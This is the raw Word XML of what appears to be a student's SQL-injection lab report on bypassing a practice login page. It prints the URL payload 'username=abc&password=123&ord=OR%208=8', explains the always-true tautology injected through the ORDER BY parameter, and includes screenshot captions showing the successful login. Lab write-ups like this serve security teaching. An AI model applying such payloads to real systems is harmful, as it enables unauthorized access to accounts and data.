                            </w:r>
                            <w:r w:rsidR="00847D6E" w:rsidRP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to</w:t>
                            </w:r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my </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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ord</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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parameter input</w:t>
                            </w:r>
                            <w:r w:rsid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. In the URL, I have used %20 to represent the space character between the </w:t>
                            </w:r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OR</w:t>
                            </w:r>
                            <w:r w:rsid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logical operator and the </w:t>
                            </w:r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first 8</w:t>
                            </w:r>
                            <w:r w:rsid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. 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Because</w:t>
                            </w:r>
                            <w:r w:rsidR="00847D6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the URL-Encoding version of the ASCII character space is </w:t>
                            </w:r>
                            <w:r w:rsidR="00847D6E" w:rsidRPr="00847D6E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%20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. 8=8 is an expression which is always evaluated as true. Moreover, an OR statement is true if at least one of the parts of the OR statement is true. Since the </w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B" w:rsidRPr="00C3003B">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:bCs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w:t>'</w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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8=8</w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B" w:rsidRPr="00C3003B">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="4D5156"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              </w:rPr>
                              <w:t>'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part of the </w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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OR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statement is always evaluated as true, regardless of the evaluations of the username and password, the entire condition of </w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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WHERE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part of the query becomes true at the end. Therefore, this </w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420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situation 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means that my payload string inputs for the username and password are successful. This </w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420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situation 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also means that I was able to bypass the login </w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420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>screen and</w:t>
                            </w:r>
                            <w:r w:rsidR="00C3003B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exploit the vulnerability of the system.</w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420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14:paraId="46BAED0D" w14:textId="0C24F287" w:rsidR="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6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0078E09D" w14:textId="7671FDB8" w:rsidR="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6">
                            <w:pPr>
                              <w:spacing w:line="276" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">Note: </w:t>
                            </w:r>
                            <w:r>
                              <w:t>Instead of ampersand symbol</w:t>
                            </w:r>
                            <w:r w:rsidR="00835727">
                              <w:t xml:space="preserve"> (&amp;)</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">, I could have used </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>%26</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> in the payload string that I have entered to the URL.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="20B1299A" w14:textId="11DCF761" w:rsidR="007A3420" w:rsidRPr="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6">
                            <w:pPr>
                              <w:spacing w:line="276" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Because the </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>URL-Encoding version of the ASCII character &amp;</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> is </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>%26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A2D1" id="Metin Kutusu 16" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:-62.25pt;margin-top:345.6pt;width:575.35pt;height:378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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="35E6696C" w14:textId="6B5FE924" w:rsidR="00100D02" w:rsidRDefault="00100D0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100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Payloads that I have entered:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="59800974" w14:textId="1FF79F41" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="79A53A9B" w14:textId="01810920" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">For username: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>abc</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4E47B663" w14:textId="78A7D501" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">For password: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00100D02">
                        <w:t>123</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="59A37103" w14:textId="29A300D9" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                      <w:r w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">For </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>ord</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> parameter: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00100D02">
                        <w:t>OR%208=8</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D64414C" w14:textId="4BBBD9BB" w:rsidR="00240F6E" w:rsidRPr="00240F6E" w:rsidRDefault="00240F6E">
                      <w:r w:rsidRPr="00240F6E">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">The </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>entire</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00240F6E">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> payload I entered to the URL: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>&amp;username=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>abc&amp;password</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>=123&amp;ord=OR%208=8</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="082AAD06" w14:textId="2886BA79" w:rsidR="00100D02" w:rsidRDefault="00100D02"/>
                    <w:p w14:paraId="702A3E2B" w14:textId="569342A6" w:rsidR="00100D02" w:rsidRDefault="00100D02" w:rsidP="006921C6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100D02"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>Explanation about the username</w:t>
                      </w:r>
                      <w:r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 xml:space="preserve">, </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00100D02"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>password</w:t>
                      </w:r>
                      <w:r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 xml:space="preserve">, and </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r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>ord</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r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 xml:space="preserve"> parameter</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00100D02"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 xml:space="preserve"> payloads I have entered/written:</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/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  <w:r w:rsidR="00240F6E">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>I</w:t>
                      </w:r>
                      <w:r w:rsidR="00240F6E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n this question, the “ORDER BY” command at the end of the query caused (introduced) this vulnerability of the system. </w:t>
                      </w:r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Since the </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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ord</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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parameter (which is the parameter of </w:t>
                      </w:r>
                      <w:r w:rsidR="00D80D13" w:rsidRPr="00A64825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ORDER BY</w:t>
                      </w:r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part) can be manually set/assigned by the user of the system within the payload part of the URL; the login screen can be bypassed</w:t>
                      </w:r>
                      <w:r w:rsidR="00FA1E79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>, and the</w:t>
                      </w:r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vulnerability of the system can be exploited. I have entered</w:t>
                      </w:r>
                      <w:r w:rsidR="00B53F66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="00B53F66" w:rsidRPr="00B53F66">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>abc</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D80D13" w:rsidRPr="00A64825">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> as the username payload string input and </w:t>
                      </w:r>
                      <w:r w:rsidR="00B53F66" w:rsidRPr="00B53F6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123</w:t>
                      </w:r>
                      <w:r w:rsidR="00D80D13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as the password payload string input. </w:t>
                      </w:r>
                      <w:r w:rsidR="00847D6E" w:rsidRP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However, as inputs, any arbitrary username and password payload strings can be provided by the users of this system. </w:t>
                      </w:r>
                      <w:r w:rsidR="00D80D13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Because, for </w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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all</w:t>
                      </w:r>
                      <w:r w:rsidR="00D80D13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the password inputs and username inputs provided, </w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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since they are directly entered to the </w:t>
                      </w:r>
                      <w:r w:rsid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payload part of </w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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URL</w:t>
                      </w:r>
                      <w:r w:rsid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A64825" w:rsidRPr="00A64825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(not to the corresponding text boxes</w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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which can take inputs</w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825" w:rsidRPr="00A64825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)</w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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, </w:t>
                      </w:r>
                      <w:r w:rsidR="00D80D13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the system treats them as </w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825" w:rsidRP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?</w:t>
                      </w:r>
                      <w:r w:rsidR="00A64825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. </w:t>
                      </w:r>
                      <w:r w:rsid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I have entered </w:t>
                      </w:r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OR 8=8 tautology </w:t>
                      </w:r>
                      <w:r w:rsidR="00847D6E" w:rsidRP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to</w:t>
                      </w:r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my </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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ord</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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parameter input</w:t>
                      </w:r>
                      <w:r w:rsid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. In the URL, I have used %20 to represent the space character between the </w:t>
                      </w:r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OR</w:t>
                      </w:r>
                      <w:r w:rsid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logical operator and the </w:t>
                      </w:r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first 8</w:t>
                      </w:r>
                      <w:r w:rsid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. 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Because</w:t>
                      </w:r>
                      <w:r w:rsidR="00847D6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the URL-Encoding version of the ASCII character space is </w:t>
                      </w:r>
                      <w:r w:rsidR="00847D6E" w:rsidRPr="00847D6E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%20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. 8=8 is an expression which is always evaluated as true. Moreover, an OR statement is true if at least one of the parts of the OR statement is true. Since the </w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B" w:rsidRPr="00C3003B">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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</w:rPr>
                        <w:t>'</w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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8=8</w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B" w:rsidRPr="00C3003B">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="4D5156"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t>'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part of the </w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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OR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statement is always evaluated as true, regardless of the evaluations of the username and password, the entire condition of </w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B" w:rsidRPr="00C300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WHERE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part of the query becomes true at the end. Therefore, this </w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420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situation 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means that my payload string inputs for the username and password are successful. This </w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420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situation 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also means that I was able to bypass the login </w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420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>screen and</w:t>
                      </w:r>
                      <w:r w:rsidR="00C3003B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exploit the vulnerability of the system.</w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420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</w:p>
                    <w:p w14:paraId="46BAED0D" w14:textId="0C24F287" w:rsidR="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6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0078E09D" w14:textId="7671FDB8" w:rsidR="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6">
                      <w:pPr>
                        <w:spacing w:line="276" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">Note: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>Instead of ampersand symbol</w:t>
                      </w:r>
                      <w:r w:rsidR="00835727">
                        <w:t xml:space="preserve"> (&amp;)</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">, I could have used </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>%26</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> in the payload string that I have entered to the URL.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="20B1299A" w14:textId="11DCF761" w:rsidR="007A3420" w:rsidRPr="007A3420" w:rsidRDefault="007A3420" w:rsidP="006921C6">
                      <w:pPr>
                        <w:spacing w:line="276" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Because the </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>URL-Encoding version of the ASCII character &amp;</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> is </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>%26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7BF7FF6" wp14:editId="788FBE81">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-720754</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4170668</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7080250" cy="218114"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Metin Kutus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0" cy="21811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2498BE" w14:textId="5D194B9A" w:rsidR="00DA6ADC" w:rsidRPr="007A3420" w:rsidRDefault="00DA6ADC" w:rsidP="00DA6AD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 w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">Screenshot which shows the successful login message after I enter correct payloads in the </w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>third</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A3420">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> challenge of question2</w:t>
                            </w:r>
                            <w:r w:rsidR="007A3420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3F048146" w14:textId="77777777" w:rsidR="00DA6ADC" w:rsidRPr="006821F2" w:rsidRDefault="00DA6ADC" w:rsidP="00DA6AD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7FF6" id="Metin Kutusu 14" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:-56.75pt;margin-top:328.4pt;width:557.5pt;height:17.1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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="482498BE" w14:textId="5D194B9A" w:rsidR="00DA6ADC" w:rsidRPr="007A3420" w:rsidRDefault="00DA6ADC" w:rsidP="00DA6ADC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 w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">Screenshot which shows the successful login message after I enter correct payloads in the </w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>third</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A3420">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> challenge of question2</w:t>
                      </w:r>
                      <w:r w:rsidR="007A3420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3F048146" w14:textId="77777777" w:rsidR="00DA6ADC" w:rsidRPr="006821F2" w:rsidRDefault="00DA6ADC" w:rsidP="00DA6ADC">
                      <w:pPr>
                        <w:pStyle w:val="ResimYazs"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:noProof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E64C7A5" w14:textId="247B8961" w:rsidR="001D74DA" w:rsidRPr="00B90F0C" w:rsidRDefault="007A3420">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3420">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fourth Challenge (Fourth Part)</w:t>
      </w:r>
      <w:r w:rsidR="001D74D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6B8BDA" wp14:editId="3E8DE541">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-773960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4466165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6953885" cy="192947"/>
                <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Metin Kutus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885" cy="19294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99528" w14:textId="72207075" w:rsidR="001D74DA" w:rsidRPr="00E003E8" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D74DA">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>(for the case where username =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B8BDA" id="Metin Kutusu 6" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-60.95pt;margin-top:351.65pt;width:547.55pt;height:1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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="09499528" w14:textId="72207075" w:rsidR="001D74DA" w:rsidRPr="00E003E8" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D74DA">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where username = admin)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D74DA">
        <w:rPr>
          <w:b/>
          <w:bCs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47D87C0F" wp14:editId="22769EE8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-773960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>246502</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7214445" cy="4218888"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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3887" cy="4230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1E51E1" w14:textId="6A21DDFB" w:rsidR="001D74DA" w:rsidRDefault="00560F06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00DE5F" wp14:editId="78A1718C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-773669</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9186510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6819900" cy="192947"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7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19294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34EBF8" w14:textId="3D471806" w:rsidR="001D74DA" w:rsidRPr="00573393" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D74DA">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>(for the case where username =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0DE5F" id="Metin Kutusu 7" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:-60.9pt;margin-top:723.35pt;width:537pt;height:15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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5B34EBF8" w14:textId="3D471806" w:rsidR="001D74DA" w:rsidRPr="00573393" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D74DA">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where username = admin)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5B4B2BA5" wp14:editId="0B67AE55">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-773961</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4618664</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7214235" cy="4511040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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238" cy="4511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74DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C98DEB" w14:textId="15B9A12D" w:rsidR="00B90F0C" w:rsidRDefault="00B90F0C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2EBDCFE" wp14:editId="1BEF0ADD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-755650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-757398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7298422" cy="4508500"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone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422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8E93C" w14:textId="26AD3EAB" w:rsidR="00B90F0C" w:rsidRDefault="00B90F0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7E8F1C3" wp14:editId="134FD3CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-757182</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3611985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7214235" cy="176169"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapNone/>
                <wp:docPr id="13" name="Metin Kutusu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4235" cy="17616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621C76" w14:textId="39AF8091" w:rsidR="001D74DA" w:rsidRPr="00E40B2D" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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Fourth Challenge Screenshot 3 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="001D74DA">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>(for the case where username = admin)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8F1C3" id="Metin Kutusu 13" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:-59.6pt;margin-top:284.4pt;width:568.05pt;height:13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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="23621C76" w14:textId="39AF8091" w:rsidR="001D74DA" w:rsidRPr="00E40B2D" w:rsidRDefault="001D74DA" w:rsidP="001D74DA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Fourth Challenge Screenshot 3 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="001D74DA">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where username = admin)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D56F4C" wp14:editId="0A70F43A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-764028</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8580743</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7146925" cy="635"/>
                <wp:effectExtent l="0" t="0" r="3175" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Metin Kutus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847643" w14:textId="19117DA9" w:rsidR="00B90F0C" w:rsidRPr="00EF3400" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0C">
                            <w:pPr>
                              <w:pStyle w:val="ResimYazs"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Fourth Challenge Screenshot 4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(for the case where the username=jack)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56F4C" id="Metin Kutusu 19" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:-60.15pt;margin-top:675.65pt;width:562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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7F847643" w14:textId="19117DA9" w:rsidR="00B90F0C" w:rsidRPr="00EF3400" w:rsidRDefault="00B90F0C" w:rsidP="00B90F0C">
                      <w:pPr>
                        <w:pStyle w:val="ResimYazs"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Fourth Challenge Screenshot 4 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B90F0C">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>(for the case where the username=jack)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04089F2D" wp14:editId="2AEE38C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-755685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3969997</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7147420" cy="4482895"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635"/>
            <wp:wrapNone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7420" cy="448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80CBDE2" w14:textId="06AA9E91" w:rsidR="00B90F0C" w:rsidRDefault="00B90F0C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3757726" wp14:editId="11FA0E13">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-796395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-773547</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7264400" cy="4202430"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapNone/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2E5FC" w14:textId="615374E8" w:rsidR="00B90F0C" w:rsidRDefault="00560F06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09707400" wp14:editId="6330D7BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-799127</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3762987</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7306310" cy="4950735"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/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829" cy="49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0F0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393B0F" wp14:editId="0EAD2E59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-795655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8772612</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7264400" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapNone/>
